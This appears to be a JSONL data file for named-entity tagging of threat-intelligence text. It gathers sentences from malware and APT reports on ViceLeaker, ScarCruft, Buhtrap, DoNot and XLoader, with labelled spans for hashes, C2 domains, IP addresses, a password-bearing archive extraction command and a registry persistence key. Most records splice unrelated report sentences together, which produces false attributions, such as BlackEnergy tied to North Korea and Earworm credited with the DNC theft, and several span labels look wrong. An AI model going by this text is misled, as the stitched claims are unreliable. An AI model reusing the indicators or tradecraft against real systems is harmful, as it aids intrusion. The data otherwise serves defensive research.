This malware is responsible for stealing Bluetooth device information .", "spans": [{"start": 64, "end": 77, "label": "Indicator"}, {"start": 118, "end": 131, "label": "Indicator"}, {"start": 174, "end": 188, "label": "Indicator"}, {"start": 216, "end": 230, "label": "Indicator"}, {"start": 261, "end": 275, "label": "Indicator"}, {"start": 326, "end": 340, "label": "Indicator"}, {"start": 395, "end": 409, "label": "Indicator"}, {"start": 438, "end": 452, "label": "Indicator"}, {"start": 584, "end": 591, "label": "Malware"}, {"start": 594, "end": 601, "label": "Malware"}, {"start": 612, "end": 619, "label": "Malware"}, {"start": 663, "end": 672, "label": "System"}]} {"text": "implemented 9 reqcalllog.php Take photo ( muted audio ) with rear camera , send to C2 10 reqcalllog.php Take photo ( muted audio ) with front camera , send to C2 All observed samples with Smali injections were signed by the same debug certificate ( 0x936eacbe07f201df ) . But , thanks to the attackers known affection for decoy documents that pose as news summaries , we were able to date the campaign back to March 2018 . It is fetched by a downloader , and collects information directly from the infected host .", "spans": [{"start": 14, "end": 28, "label": "Indicator"}, {"start": 89, "end": 103, "label": "Indicator"}, {"start": 292, "end": 301, "label": "Organization"}]} {"text": "As we know from our investigation , traces of the first development activities were found at the end of 2016 , but the main distribution campaign began in 2018 ( end of 2017 ) . With the experience gained from the APT attack that began in March 2017 , it seems this campaign has evolved into an attack with new capabilities , and an even more specific target , over a year later . 
This malware uses Windows Bluetooth APIs to find information on connected Bluetooth devices and saves the following information .", "spans": [{"start": 399, "end": 406, "label": "System"}, {"start": 407, "end": 416, "label": "System"}, {"start": 455, "end": 464, "label": "System"}]} {"text": "Based on our detection statistics , the main infection vector is the spread of Trojanized applications directly to victims via Telegram and WhatsApp messengers . These unknown actors continued launching DDoS attacks over the next few years . We have found several victims of this campaign , based on our telemetry \u2013 investment and trading companies in Vietnam and Russia .", "spans": [{"start": 168, "end": 182, "label": "Organization"}]} {"text": "There are the following relevant detection paths ( the last one is an alternative Telegram client \u2013 \u201c Telegram X \u201c ) : Name Detection path Sex Game For Adults 18.apk /storage/emulated/0/WhatsApp/Media/WhatsApp Documents/ 4_6032967490689041387.apk /storage/emulated/0/Telegram/Telegram Documents/ Psiphon-v91.apk /storage/emulated/0/Android/data/org.thunderdog.challegram/files/documents/ Backdoored Open Source During the course For simplicity , Kaspersky is calling them the BlackEnergy APT group . We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them .", "spans": [{"start": 159, "end": 165, "label": "Indicator"}, {"start": 166, "end": 295, "label": "Indicator"}, {"start": 296, "end": 311, "label": "Indicator"}, {"start": 312, "end": 387, "label": "Indicator"}, {"start": 446, "end": 455, "label": "Organization"}, {"start": 575, "end": 584, "label": "Organization"}]} {"text": "of our analysis , we also found samples sharing code with the ViceLeaker malware , in particular they shared a delimiter that was used in both cases to parse commands from the C2 server . 
Since the middle of 2015 , one of the preferred attack vectors for BlackEnergy in Ukraine has been Excel documents with macros that drop the Trojan to disk if the user chooses to run the script in the document . ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea .", "spans": [{"start": 62, "end": 72, "label": "Malware"}, {"start": 255, "end": 266, "label": "Organization"}, {"start": 400, "end": 409, "label": "Organization"}]} {"text": "This would be a very unusual coincidence . A very good analysis and overview of the BlackEnergy attacks in Ukraine throughout 2014 and 2015 was published by the Ukrainian security firm Cys Centrum the text is only available in Russian for now , but can be read via Google Translate . It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes .", "spans": [{"start": 185, "end": 196, "label": "Organization"}, {"start": 295, "end": 304, "label": "Organization"}]} {"text": "Even when a false flag might also be a possibility , we consider this to be unlikely . The earliest signs of destructive payloads with BlackEnergy go back as far as June 2014 . We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past .", "spans": [{"start": 135, "end": 146, "label": "Organization"}]} {"text": "The samples sharing this overlap are modified versions of an open source Jabber/XMPP client called \u201c Conversations \u201d with some code additions . BlackEnergy is a highly dynamic threat actor and the current attacks in Ukraine indicate that destructive actions are on their main agenda , in addition to compromising industrial control installations and espionage activities . 
The fact that this victim visits North Korea makes its special and suggests that it may have valuable information about North Korean affairs .", "spans": [{"start": 73, "end": 84, "label": "System"}, {"start": 144, "end": 155, "label": "Organization"}]} {"text": "The legitimate version of this app is also available on Google Play . Kaspersky will continue to monitor the BlackEnergy attacks in Ukraine and update our readers with more data when available . ScarCruft infected this victim on September 21, 2018 .", "spans": [{"start": 56, "end": 67, "label": "System"}, {"start": 70, "end": 79, "label": "Organization"}, {"start": 109, "end": 120, "label": "Organization"}, {"start": 195, "end": 204, "label": "Organization"}]} {"text": "The Conversations modified samples differ from the original one in the getKnownHosts method that was modified to replace the main XMPP host with the attackers \u2019 C2 server : It appears that the attackers were using a specific C2 for the use of that app . From Buhtrap perpetrating cybercrime for financial gain , its toolset has been expanded with malware used to conduct espionage in Eastern Europe and Central Asia . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26, 2018 .", "spans": [{"start": 130, "end": 134, "label": "System"}, {"start": 259, "end": 266, "label": "Organization"}, {"start": 433, "end": 442, "label": "Organization"}, {"start": 543, "end": 557, "label": "Malware"}]} {"text": "Another important modification is in the message transfer process : With this modification , an application sends device location coordinates with every message . Throughout our tracking , we've seen this group deploy its main backdoor as well as other tools against various victims , but June 2019 was the first time we saw the Buhtrap group use a zero-day exploit as part of a campaign . 
GreezeBackdoor is a tool of the DarkHotel APT group , which we have previously written about .", "spans": [{"start": 189, "end": 194, "label": "Organization"}, {"start": 200, "end": 210, "label": "Organization"}, {"start": 329, "end": 336, "label": "Organization"}, {"start": 390, "end": 404, "label": "Malware"}, {"start": 422, "end": 431, "label": "Organization"}]} {"text": "There are also many other modifications , fully described in our private report . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . In addition , this victim was also attacked by the Konni malware on 03 April 2018 .", "spans": [{"start": 109, "end": 116, "label": "Organization"}, {"start": 162, "end": 175, "label": "Vulnerability"}, {"start": 258, "end": 263, "label": "Malware"}]} {"text": "In addition , we did not see traces of the Smali injection . However , as the shift in targets occurred before the source code leak , we assess with high confidence that the same people behind the first Buhtrap malware attacks against businesses and banks are also involved in targeting governmental institutions . 
The Konni malware was disguised as a North Korean news item in a weaponized documents ( the name of the document was \u201c Why North Korea slams South Korea \u2019s recent defense talks with U.S-Japan.zip \u201d ) This is not the first time we have seen an overlap of ScarCruft and DarkHotel actors .", "spans": [{"start": 203, "end": 210, "label": "Organization"}, {"start": 235, "end": 245, "label": "Organization"}, {"start": 250, "end": 255, "label": "Organization"}, {"start": 287, "end": 312, "label": "Organization"}, {"start": 319, "end": 324, "label": "Malware"}, {"start": 497, "end": 510, "label": "Indicator"}, {"start": 569, "end": 578, "label": "Organization"}, {"start": 583, "end": 592, "label": "Organization"}]} {"text": "In this case we found traces of dx/dexmerge compilers , which means that , this time , the attackers just imported the original source code into an Android IDE ( such as Android Studio , for instance ) and compiled it with their own modifications . When Buhtrap was targeting businesses , the decoy documents would typically be contracts or invoices . Members from our team have already presented on the conflict of these two threat actors at security conferences .", "spans": [{"start": 148, "end": 155, "label": "System"}, {"start": 170, "end": 184, "label": "System"}, {"start": 254, "end": 261, "label": "Organization"}, {"start": 276, "end": 286, "label": "Organization"}]} {"text": "In addition to adding the code , the attackers also changed the icon and package name . The Buhtrap group is well known for its targeting of financial institutions and businesses in Russia . We have also shared more details with our threat intelligence customers in the past .", "spans": [{"start": 92, "end": 99, "label": "Organization"}, {"start": 141, "end": 163, "label": "Organization"}]} {"text": "We do not know why , but we suspect that it was an attempt to hide the origin of the application . 
Figure 2 is a typical example of a generic invoice the group used in a campaign in 2014 . They are both Korean-speaking threat actors and sometimes their victimology overlaps .", "spans": [{"start": 154, "end": 159, "label": "Organization"}]} {"text": "Conversations-based app mimics Telegram messenger Even when we originally thought this was a backdoored version of the Conversations app , used to infect victims , we didn\u00b4t discovered anything malicious in it . When the group's focus shifted to banks , the decoy documents were related to banking system regulations or advisories from FinCERT , an organization created by the Russian government to provide help and guidance to its financial institutions . But both group seem to have different TTPs ( Tactics , Techniques and Procedures ) and it leads us to believe that one group regularly lurks in the other \u2019s shadow .", "spans": [{"start": 31, "end": 49, "label": "System"}, {"start": 221, "end": 228, "label": "Organization"}, {"start": 336, "end": 343, "label": "Organization"}]} {"text": "This brought to us the hypothesis that this might be a version used by the group behind ViceLeaker for internal communication or for other , unclear purposes . We confirmed that this is a DarkHydrus Group's new attack targeting Middle East region . The ScarCruft has shown itself to be a highly-skilled and active group .", "spans": [{"start": 88, "end": 98, "label": "Malware"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 253, "end": 262, "label": "Organization"}]} {"text": "All the detections of this backdoored app were geolocated in Iran . In July 2018 , Palo Alto disclosed DarkHydrus Group which showed its special interest to governments in Middle East . 
It has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": [{"start": 83, "end": 92, "label": "Organization"}, {"start": 103, "end": 113, "label": "Organization"}, {"start": 157, "end": 168, "label": "Organization"}]} {"text": "Backdoored Conversations C2 server analysis During the analysis of the Smali injected apps and their C2 server infrastructure we hadn \u2019 t found any interesting clues , but things changed when we looked at the C2 server of the linked Conversations messenger . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . ScarCruft tools : 02681a7fe708f39beb7b3cf1bd557ee9 Bluetooth info harvester .", "spans": [{"start": 333, "end": 346, "label": "Vulnerability"}, {"start": 436, "end": 446, "label": "Organization"}, {"start": 449, "end": 458, "label": "Organization"}, {"start": 467, "end": 499, "label": "Indicator"}, {"start": 500, "end": 509, "label": "System"}]} {"text": "It uses \u201c 185.51.201 [ . However , the final payload is something that welivesecurity have never seen associated with Buhtrap . ScarCruft tools : C781f5fad9b47232b3606e4d374900cd Installer .", "spans": [{"start": 10, "end": 24, "label": "Indicator"}, {"start": 71, "end": 85, "label": "Organization"}, {"start": 118, "end": 125, "label": "Organization"}, {"start": 128, "end": 137, "label": "Organization"}, {"start": 146, "end": 178, "label": "Indicator"}, {"start": 179, "end": 188, "label": "System"}]} {"text": "] 133 \u201d as a main C2 address , and there is only one domain that is hosted on this dedicated server \u2013 iliageram [ . It's coincident that both 'darkhydrus' APT group name and \u2018Williams\u2019 user name in PDB path found in this Twitter user . 
ScarCruft tools : 032ed0cd234f73865d55103bf4ceaa22 Downloader .", "spans": [{"start": 102, "end": 115, "label": "Indicator"}, {"start": 142, "end": 154, "label": "Organization"}, {"start": 174, "end": 184, "label": "Organization"}, {"start": 221, "end": 233, "label": "Organization"}, {"start": 236, "end": 245, "label": "Organization"}, {"start": 254, "end": 286, "label": "Indicator"}, {"start": 287, "end": 297, "label": "System"}]} {"text": "] ir . In recent APT incidents , Dark Hydruns tend to adopt Office VBA macro instead of Office 0day vulnerability in the consideration of cost reduction . ScarCruft tools : 22aaf617a86e026424edb7c868742495 AV Remover .", "spans": [{"start": 33, "end": 45, "label": "Organization"}, {"start": 60, "end": 76, "label": "System"}, {"start": 155, "end": 164, "label": "Organization"}, {"start": 173, "end": 205, "label": "Indicator"}, {"start": 206, "end": 216, "label": "System"}]} {"text": "Note that we later found versions that used the domain as a C2 directly instead of the IP address . ASERT uncovered a credential theft campaign we call LUCKY ELEPHANT where attackers masquerade as legitimate entities such as foreign government , telecommunications , and military . 
ScarCruft tools : 07d2200f5c2d03845adb5b20841faa94 AV Remover .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 152, "end": 166, "label": "Organization"}, {"start": 225, "end": 243, "label": "Organization"}, {"start": 246, "end": 264, "label": "Organization"}, {"start": 271, "end": 279, "label": "Organization"}, {"start": 282, "end": 291, "label": "Organization"}, {"start": 300, "end": 332, "label": "Indicator"}, {"start": 333, "end": 343, "label": "System"}]} {"text": "The record contains a personal email address : WHOIS records of C2 server exposing the attacker \u2019 s email address We were aware of the possibility that the attackers might be using a compromised email account , so we dug deeper to find more information related to this email address . From at least February 2019 to present , the actors in the LUCKY ELEPHANT campaign copied webpages to mimic South Asian government websites as well as Microsoft Outlook 365 login pages and hosted them on their own doppelganger domains , presumably to trick victims into providing login credentials . GreezaBackdoor of DarkHotel : 5e0e11bca0e94914e565c1dcc1ee6860 .", "spans": [{"start": 344, "end": 358, "label": "Organization"}, {"start": 393, "end": 424, "label": "Organization"}, {"start": 436, "end": 453, "label": "Organization"}, {"start": 585, "end": 599, "label": "Malware"}, {"start": 603, "end": 612, "label": "Organization"}, {"start": 615, "end": 647, "label": "Indicator"}]} {"text": "A quick search produced results about a personal page and , what is more interesting , a GitHub account that contains a forked Conversation repository . ASERT suspects that the Actors use phishing emails to lure victims to the doppelganger websites and entice users to enter their credentials . 
TA505 is Expanding its Operations In the last few days , during monitoring activities , Yoroi CERT noticed a suspicious attack against an Italian organization .", "spans": [{"start": 89, "end": 95, "label": "Organization"}, {"start": 153, "end": 158, "label": "Organization"}, {"start": 295, "end": 300, "label": "Organization"}, {"start": 383, "end": 393, "label": "Organization"}]} {"text": "Related Github account contains forked Conversations repository Summarizing all the found clues , we have the following attribution flow : Conclusion The operation of ViceLeaker is still ongoing , as is our research . It is important to note that one domain , yahoomail[.]cf is only associated with this group from February 2019 onward . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation .", "spans": [{"start": 8, "end": 14, "label": "Organization"}, {"start": 167, "end": 177, "label": "Malware"}, {"start": 304, "end": 309, "label": "Organization"}, {"start": 352, "end": 357, "label": "System"}, {"start": 414, "end": 418, "label": "Organization"}, {"start": 528, "end": 533, "label": "Organization"}]} {"text": "The attackers have taken down their communication channels and are probably looking for ways to assemble their tools in a different manner . In late 2018 , the domain was associated with a different APT group / campaign of Chinese origin . The threat group is also known for its recent attack campaign against Bank and Retail business sectors , but the latest evidence indicates a potential expansion of its criminal operation to other industries too .", "spans": [{"start": 199, "end": 208, "label": "Organization"}]} {"text": "Kaspersky detects and blocks samples of the ViceLeaker operation using the following verdict : Trojan-Spy.AndroidOS.ViceLeaker . 
Based on our analysis into the activity , ASERT deems with moderate confidence that an Indian APT group is behind the LUCKY ELEPHANT campaign . Dropper : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273 Excel file with malicious macro .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 44, "end": 54, "label": "Malware"}, {"start": 95, "end": 128, "label": "Indicator"}, {"start": 216, "end": 232, "label": "Organization"}, {"start": 273, "end": 280, "label": "Malware"}, {"start": 283, "end": 347, "label": "Indicator"}, {"start": 348, "end": 353, "label": "System"}, {"start": 364, "end": 379, "label": "System"}]} {"text": "* Actually , we are currently investigating whether this group might also be behind a large-scale web-oriented attack at the end of 2018 using code injection and exploiting SQL vulnerabilities . The targets are typical of known Indian APT activity and the infrastructure was previously used by an Indian APT group . The intercepted attack starts with a spear phishing email embedding a spreadsheet .", "spans": [{"start": 173, "end": 192, "label": "Vulnerability"}, {"start": 304, "end": 313, "label": "Organization"}]} {"text": "Even when this would not be directly related to the Android malware described in this blogpost , it would be an indicator of wider capabilities and objectives of this actor . DoNot Team has a history of heavily targeting Pakistan , in addition to other neighboring countries . 
The document is weaponized with malicious macro code triggered when the user opens the document to see the content under the obfuscated view .", "spans": [{"start": 52, "end": 59, "label": "System"}, {"start": 175, "end": 185, "label": "Organization"}, {"start": 309, "end": 324, "label": "System"}]} {"text": "XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China . To understand its capabilities , the macro code has been isolated and analyzed in detail .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 8, "end": 15, "label": "System"}, {"start": 343, "end": 364, "label": "Organization"}, {"start": 421, "end": 426, "label": "System"}]} {"text": "Trend Micro detects these as ANDROIDOS_XLOADER.HRX . DoNot Team\u2019s confirmed use of this IP dates back to September 2018 , with a six-month gap until it was used to host doppelganger domains for the LUCKY ELEPHANT campaign in early February . Surprisingly , the source code is composed by more than 1600 lines of code and it is highly obfuscated .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 29, "end": 50, "label": "Indicator"}, {"start": 53, "end": 58, "label": "Organization"}]} {"text": "By : Trend Micro April 20 , 2018 We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong . One of the IP addresses , 128.127.105.13 , was previously used by the DoNot Team (aka APT-C-35) , a suspected Indian APT group . 
Paying more attention during the code analysis , we discovered that it is full of junk instructions used to declare and initialize variables never used .", "spans": [{"start": 5, "end": 16, "label": "Organization"}, {"start": 257, "end": 267, "label": "Organization"}]} {"text": "The attacks use Domain Name System ( DNS ) cache poisoning/DNS spoofing , possibly through infringement techniques such as brute-force or dictionary attacks , to distribute and install malicious Android apps . The actors behind LUCKY ELEPHANT recognize the effectiveness and use doppelganger webpages nearly identical to legitimate sites , enticing users to input their credentials . Only a small portion of this code is actually used to start the infection , the rest is just junk code .", "spans": [{"start": 195, "end": 202, "label": "System"}, {"start": 228, "end": 242, "label": "Organization"}, {"start": 279, "end": 300, "label": "System"}]} {"text": "Trend Micro detects these as ANDROIDOS_XLOADER.HRX . The heavier targeting in Pakistan adheres to historical targeting and the ongoing tension between the two countries , which has escalated since a terrorist attack in Kashmir on 14 February 2019 . Once the macro is executed , the malware downloads two files from \u201c kentona[.su \u201d , using an SSL encrypted communication , and stores them in \u201c C:\\Users\\Public \u201d path : \u201c rtegre.exe \u201d and \u201c wprgxyeqd79.exe \u201d .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 29, "end": 50, "label": "Indicator"}, {"start": 258, "end": 263, "label": "System"}, {"start": 317, "end": 328, "label": "Indicator"}, {"start": 342, "end": 345, "label": "Indicator"}, {"start": 420, "end": 430, "label": "Indicator"}, {"start": 439, "end": 454, "label": "Indicator"}]} {"text": "These malware pose as legitimate Facebook or Chrome applications . 
The targeting of Pakistan , Bangladesh , Sri Lanka , Maldives , Myanmar , Nepal , and the Shanghai Cooperation Organization are all historical espionage targets by India . Generic : aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7 Trojan S-MAL/Downloader ( Executable file ) .", "spans": [{"start": 33, "end": 41, "label": "System"}, {"start": 45, "end": 51, "label": "System"}, {"start": 157, "end": 190, "label": "Organization"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 239, "end": 246, "label": "Malware"}, {"start": 249, "end": 313, "label": "Indicator"}, {"start": 314, "end": 337, "label": "System"}]} {"text": "They are distributed from polluted DNS domains that send a notification to an unknowing victim \u2019 s device . However , it is clear is that Donot are actively establishing infrastructure and are targeting governments in South Asia . Trojan : 6f1a8ee627ec2ed7e1d818d32a34a163416938eb13a97783a71f9b79843a80a2 SFX ( self-extracting archive ) ( Executable file ) .", "spans": [{"start": 138, "end": 143, "label": "Organization"}, {"start": 231, "end": 237, "label": "Malware"}, {"start": 240, "end": 304, "label": "Indicator"}, {"start": 305, "end": 308, "label": "System"}, {"start": 311, "end": 334, "label": "System"}]} {"text": "The malicious apps can steal personally identifiable and financial data and install additional apps . First attack of this campaign took place in May 2018 . The \u201c wprgxyeqd79.exe \u201d sample actually is a Self Extracting Archive ( SFX S-TOOL/SFA ) containing four files designed to be extracted in the %TEMP% folder .", "spans": [{"start": 163, "end": 178, "label": "Indicator"}, {"start": 202, "end": 225, "label": "System"}, {"start": 228, "end": 242, "label": "System"}]} {"text": "XLoader can also hijack the infected device ( i.e. , send SMSs ) and sports self-protection/persistence mechanisms through device administrator privileges . 
Arbor also published APT research on this group , and named it \u2018Donot\u2019 . After that , it executes \u201c exit.exe \u201d which launches the \u201c i.cmd \u201d batch script .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 157, "end": 162, "label": "Organization"}, {"start": 220, "end": 227, "label": "Organization"}, {"start": 257, "end": 265, "label": "Indicator"}, {"start": 289, "end": 294, "label": "Indicator"}]} {"text": "Infection Chain As with our earlier reports in late March , the attack chain involves diverting internet traffic to attacker-specified domains by compromising and overwriting the router \u2019 s DNS settings . Donot attacked government agencies , aiming for classified intelligence . This new script performs a ping to \u201c www[.cloudflare[.com \u201d for three times with a delay of 3000ms , testing the connectivity of the victim machine .", "spans": [{"start": 205, "end": 210, "label": "Organization"}, {"start": 220, "end": 239, "label": "Organization"}, {"start": 316, "end": 336, "label": "Indicator"}]} {"text": "A fake alert will notify and urge the user to access the malicious domain and download XLoader . We identified this APT group coded as \u2018APT-C-35\u2019 in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage . If the host is successfully reached , the script renames a file named \u201c kernel.dll \u201d , obviously not the real one , in \u201c uninstall.exe \u201d , another misleading name .", "spans": [{"start": 87, "end": 94, "label": "Malware"}, {"start": 135, "end": 145, "label": "Organization"}, {"start": 315, "end": 325, "label": "Indicator"}, {"start": 364, "end": 377, "label": "Indicator"}]} {"text": "Technical Analysis XLoader first loads the encrypted payload from Assets/db as test.dex to drop the necessary modules then requests for device administrator privileges . At least 4 attack campaigns against Pakistan have been observed by us since 2017 . 
Then it invokes the renamed executable and runs it passing a series of parameter : \u201c uninstall.exe x -pQELRatcwbU2EJ5 -y \u201d", "spans": [{"start": 19, "end": 26, "label": "Malware"}, {"start": 66, "end": 75, "label": "Indicator"}, {"start": 79, "end": 87, "label": "Indicator"}, {"start": 338, "end": 351, "label": "Indicator"}]} {"text": "Once granted permission , it hides its icon from the launcher application list then starts a service that it keeps running in the background . Spear phishing emails with vulnerable Office documents or malicious macros are sent to victims . These parameters are needed to self-decrypt the \u201c uninstall.exe \u201d file which is again another SFX archive .", "spans": [{"start": 143, "end": 157, "label": "System"}, {"start": 290, "end": 303, "label": "Indicator"}, {"start": 334, "end": 337, "label": "System"}]} {"text": "The background service uses the reflection technique ( a feature that allows the inspection and modification of Java-based programs \u2019 internal properties ) to invoke the method com.Loader.start in the payload . In the latest attack , Donot group is targeting Pakistani businessman working in China . The \u201c -p \u201d parameter , indeed , specify the password of the archive to be extracted .", "spans": [{"start": 177, "end": 193, "label": "Indicator"}, {"start": 234, "end": 245, "label": "Organization"}, {"start": 259, "end": 280, "label": "Organization"}]} {"text": "Monitoring Broadcast Events XLoader registers many broadcast receivers in the payload dynamically ( to monitor broadcast events sent between system and applications ) . Two unique malware frameworks , EHDevel and yty , are developed by attackers . 
The crucial file , at this point of the infection , is the SFX executable named \u201c uninstall.exe \u201d .", "spans": [{"start": 28, "end": 35, "label": "Malware"}, {"start": 201, "end": 208, "label": "System"}, {"start": 213, "end": 216, "label": "System"}, {"start": 236, "end": 245, "label": "Organization"}, {"start": 307, "end": 310, "label": "System"}, {"start": 330, "end": 343, "label": "Indicator"}]} {"text": "Registering broadcast receivers enable XLoader to trigger its malicious routines . wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . It has a structure similar to previous \u201c wprgxyeqd79.exe \u201d file : two of their files have the same name , but the content of this new SFX is extracted in the \u201c %ALLUSERSPROFILE%\\Windows Anytime Upgrade \u201d directory .", "spans": [{"start": 39, "end": 46, "label": "Malware"}, {"start": 83, "end": 94, "label": "Malware"}, {"start": 100, "end": 103, "label": "System"}, {"start": 125, "end": 132, "label": "Malware"}, {"start": 137, "end": 157, "label": "Malware"}, {"start": 214, "end": 229, "label": "Indicator"}, {"start": 307, "end": 310, "label": "System"}, {"start": 333, "end": 358, "label": "System"}]} {"text": "Here is a list of broadcast actions : android.provider.Telephony.SMS_RECEIVED android.net.conn.CONNECTIVITY_CHANGE android.intent.action.BATTERY_CHANGED android.intent.action.USER_PRESENT android.intent.action.PHONE_STATE android.net.wifi.SCAN_RESULTS android.intent.action.PACKAGE_ADDED android.intent.action.PACKAGE_REMOVED android.intent.action.SCREEN_OFF android.intent.action.SCREEN_ON Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . 
Another time , the execution flow moves from \u201c exit.exe to \u201c i.cmd \u201d .", "spans": [{"start": 38, "end": 77, "label": "Indicator"}, {"start": 78, "end": 114, "label": "Indicator"}, {"start": 115, "end": 152, "label": "Indicator"}, {"start": 153, "end": 187, "label": "Indicator"}, {"start": 188, "end": 221, "label": "Indicator"}, {"start": 222, "end": 251, "label": "Indicator"}, {"start": 252, "end": 287, "label": "Indicator"}, {"start": 288, "end": 325, "label": "Indicator"}, {"start": 326, "end": 358, "label": "Indicator"}, {"start": 359, "end": 390, "label": "Indicator"}, {"start": 448, "end": 459, "label": "Malware"}, {"start": 602, "end": 610, "label": "Indicator"}, {"start": 616, "end": 621, "label": "Indicator"}]} {"text": "android.media.RINGER_MODE_CHANGED android.sms.msg.action.SMS_SEND android.sms.msg.action.SMS_DELIVERED Creating a Web Server to Phish XLoader creates a provisional web server to receive the broadcast events . From the attack activity captured this time , it is obvious that Donot APT group is still keen on Pakistan as primary target of attack , and even expands scope of attack to include Pakistani staffs and institutions in China . The script is quite different from the previous one : it guarantees its persistence on the victim machine through the setting of \u201c HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \u201d registry key , creating a new entry named \u201c Windows Anytime Upgrade \u201d which points to \u201c winserv.exe \u201d , just stored into the same folder .", "spans": [{"start": 0, "end": 33, "label": "Indicator"}, {"start": 34, "end": 65, "label": "Indicator"}, {"start": 66, "end": 102, "label": "Indicator"}, {"start": 134, "end": 141, "label": "Malware"}, {"start": 274, "end": 289, "label": "Organization"}, {"start": 663, "end": 670, "label": "System"}, {"start": 707, "end": 718, "label": "Indicator"}]} {"text": "It can also create a simple HTTP server on the infected device to deceive victims . 
Buhtrap still make extensive use of NSIS installers as droppers and these are mainly delivered through malicious documents . Thus , the script provides to run \u201c winserv.exe \u201d .", "spans": [{"start": 84, "end": 91, "label": "Organization"}, {"start": 120, "end": 135, "label": "Organization"}, {"start": 245, "end": 256, "label": "Indicator"}]} {"text": "It shows a web phishing page whenever the affected device receives a broadcast event ( i.e. , if a new package is installed or if the device \u2019 s screen is on ) to steal personal data , such as those keyed in for banking apps . They first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . An interesting part of the script is the continuous killing of every \u201c rundll32.exe \u201d process running into the victim machine , generates a huge amount of noise , as visible in the following process explorer view .", "spans": [{"start": 353, "end": 358, "label": "Organization"}, {"start": 432, "end": 444, "label": "Indicator"}]} {"text": "The phishing page is translated in Korean , Japanese , Chinese , and English , which are hardcoded in the payload . Earworm first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . Anyway , just before the kill loop , the real malicious payload is executed : the", "spans": [{"start": 116, "end": 123, "label": "Organization"}, {"start": 245, "end": 250, "label": "Organization"}]} {"text": "It will appear differently to users depending on the language set on the device . They were also behind an attack on the World Anti-Doping Agency (WADA) , in which they leaked confidential information about several drug tests . 
\u201c winserv.exe \u201d file .", "spans": [{"start": 82, "end": 86, "label": "Organization"}, {"start": 146, "end": 152, "label": "Organization"}, {"start": 230, "end": 241, "label": "Indicator"}]} {"text": "XLoader as Spyware and Banking Trojan XLoader can also collect information related to usage of apps installed in the device . SPLM , GAMEFISH , and Zebrocy delivery all maintain their own clusters , but frequently overlap later . Analyzing it in depth , we discover it actually is the RMS ( Remote Manipulator System ) client by TektonIT , encrypted using the MPress PE compressor utility , a legitimate tool , to avoid antivirus detection .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 38, "end": 45, "label": "Indicator"}, {"start": 126, "end": 130, "label": "Organization"}, {"start": 133, "end": 141, "label": "Organization"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 285, "end": 288, "label": "System"}, {"start": 291, "end": 316, "label": "System"}, {"start": 329, "end": 337, "label": "System"}, {"start": 360, "end": 369, "label": "System"}]} {"text": "Its data-stealing capabilities include collecting SMSs after receiving an SMS-related broadcast event and covertly recording phone calls . Our previous post on Sofacy's 2017 activity stepped away from the previously covered headline buzz presenting their association with previously known political hacks and interest in Europe and the US , and examines their under-reported ongoing activity in middle east , central asia , and now a shift in targeting further east , including China , along with an overlap surprise . 
TektonIT RMS acts as a remote administration tool , allowing the attacker to gain complete access to the victim machine .", "spans": [{"start": 160, "end": 168, "label": "Organization"}, {"start": 519, "end": 527, "label": "System"}, {"start": 528, "end": 531, "label": "System"}]} {"text": "XLoader can also hijack accounts linked to financial or game-related apps installed on the affected device . The larger , 300kb+ SPLM backdoors deployed in 2016 and 2017 are not observed any longer at targets in 2018 . Together with the RMS executable , there is another file named \u201c settings.dat \u201d containing the custom configuration prepared by the attacker .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 129, "end": 133, "label": "Organization"}, {"start": 237, "end": 240, "label": "System"}, {"start": 284, "end": 296, "label": "Indicator"}]} {"text": "XLoader can also start other attacker-specified packages . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed \u2013 most likely detections were related to students\u2019 and researchers\u2019 scanning known collected samples and any incidents\u201d remain unconfirmed and unknown . It contains information like : Server address and port the client will connect to ; The password chosen by the attacker for the remote access ; The ID associated to the victim client .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 152, "end": 159, "label": "Organization"}, {"start": 172, "end": 192, "label": "Organization"}]} {"text": "A possible attack scenario involves replacing legitimate apps with repackaged or malicious versions . Either way , the group's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . 
